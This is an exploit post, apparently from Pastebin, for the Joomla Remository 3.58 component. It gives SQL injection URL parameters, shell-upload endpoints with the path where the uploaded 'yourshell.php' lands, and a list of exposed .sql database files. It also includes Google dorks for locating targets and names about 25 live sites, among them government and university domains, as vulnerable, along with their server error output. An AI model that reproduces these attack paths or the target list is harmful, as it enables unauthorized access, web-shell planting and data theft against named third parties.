Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : remository.com
- # Software Download Link : remository.com/downloads/joomla-3.x-software/
- # Software Information Link : extensions.joomla.org/extension/remository/
- # Software Version : 3.58
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_remository''
- inurl:''/administrator/components/com_remository/''
- intext:Site Designed By Conservation Designs
- intext:CCCV Gabriel Valencia site:gob.ec
- intext:Web creada por softdream.es
- intext:Sponsored by Innovatron - Managed by Spirtech
- intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
- intext:Web design by Mercury Web Solutions
- intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
- intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010284
- ####################################################################
- # Description about Software :
- ***************************
- “Remository” is open source software for Joomla.
- ####################################################################
- # Impact :
- ***********
- *Attackers can exploit this issue via a browser.
- The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers
- upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input.
- An attacker can exploit this vulnerability to upload arbitrary code and run it in the
- context of the webserver process. This may facilitate unauthorized access or
- privilege escalation; other attacks are also possible.
- * An attacker might be able inject and/or alter existing
- SQL statements which would influence the database exchange.
- * SQL injection vulnerability in the Joomla Remository Components 3.58 because,
- it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- * Exploiting this issue could allow an attacker to compromise the application, read,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_remository&Itemid=[SQL Injection]
- /index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
- [ID-NUMBER]&orderby=[SQL Injection]
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
- [ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=
- [ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]
- ####################################################################
- # Arbitrary File Upload Exploit :
- ****************************
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category
- /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles
- /index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]
- /index.php/shared-file-repository/func-addmanyfiles/
- Directory File Path :
- ******************
- Search your file here.
- /components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php
- /components/com_remository_files/......
- Note : If websites are not vulnerable it says ;
- You have no permitted upload categories - please refer to the webmaster
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_remository/assignment.sql
- /administrator/components/com_remository/blob.sql
- /administrator/components/com_remository/containers.sql
- /administrator/components/com_remository/file.sql
- /administrator/components/com_remository/log.sql
- /administrator/components/com_remository/permission.sql
- /administrator/components/com_remository/repository.sql
- /administrator/components/com_remository/reviews.sql
- /administrator/components/com_remository/structure.sql
- /administrator/components/com_remository/text.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] temporalesunoa.com/dgtree/joomla/administrator/components/com_remository/repository.sql
- [+] oceap.gov.ng/administrator/components/com_remository/remository.sql
- [+] nacat.org/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
- [+] jdih.mahkamahagung.go.id/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
- [+] telecip.com.co/telecip/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
- [+] ics-casalserugo.gov.it/joomla/index.php?option=com_remository&Itemid=78&func=fileinfo&id=40%27
- [+] cccv.gob.ec/web/index.php?option=com_remository&Itemid=67&func=select&id=8%27
- [+] elsemillero.net/nuevo/index.php?option=com_remository&Itemid=165%27
- [+] pymeschamartin.softdream.es/index.php?option=com_remository
- &Itemid=7&func=select&id=5&orderby=5&page=3%27
- [+] ohaysoft.com/index.php?option=com_remository&Itemid=116&func=
- download&id=149&chk=4e4f957a2083a4f41e98e5d163e7bc37&no_html=1%27
- [+] fullthrottlesimracing.net/main/index.php?option=com_remository&Itemid=60&func=select&id=3%27
- [+] old.tpp.pulawy.pl/index.php?option=com_remository&Itemid=49&func=fileinfo&id=36%27
- [+] b2biaxis.com/index.php?option=com_remository&Itemid=416&func=fileinfo&id=2%27
- [+] concretedev.com/index.php?option=com_remository&Itemid=37%27
- [+] lexcont.de/index.php?option=com_remository&Itemid=4%27
- [+] cnawg.net/index.php?option=com_remository&Itemid=28&func=addfile
- [+] parachutemanuals.com/index.php?option=com_remository&Itemid=41&func=addfile&id=52
- [+] newyork.ing.uniroma1.it/IC0902/index.php?option=com_remository&Itemid=82&func=addfile
- [+] kline.ca/index.php?option=com_remository&Itemid=38&func=addfile&id=1
- [+] vldb.org/vldb_journal/index.php?option=com_remository&Itemid=60&func=addfile&id=13625
- [+] seytpe.gr/25/index.php?option=com_remository&Itemid=100088&func=addmanyfiles
- [+] blackburnwithdarwenlink.org.uk/index.php?option=com_remository&Itemid=11&func=addfile&id=25
- [+] station-drivers.com/index.php?option=com_remository&Itemid=353&func=addfile&id=373&lang=en
- [+] bssb.de/index.php?func=addfile&id=1215&Itemid=647&option=com_remository&datum=01-01-2018
- ####################################################################
- # SQL Database Error :
- *********************
- Strict Standards: Non-static method JLoader::import() should not be called
- statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29
- Deprecated: Assigning the return value of new by reference is deprecated in
- /home/epangsof/public_html/includes/joomla.php on line 836
- Warning: Cannot modify header information - headers already sent by
- (output started at /home/epangsof/public_html/includes/joomla.php:836) in
- /home/epangsof/public_html/includes/joomla.php on line 697
- Fatal error: Uncaught Error: Call to undefined function
- set_magic_quotes_runtime() in /home4/hbman23/public_html/main
- /includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html
- /main/index.php(22): require_once() #1 {main} thrown in
- /home4/hbman23/public_html/main/includes/framework.php on line 21
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment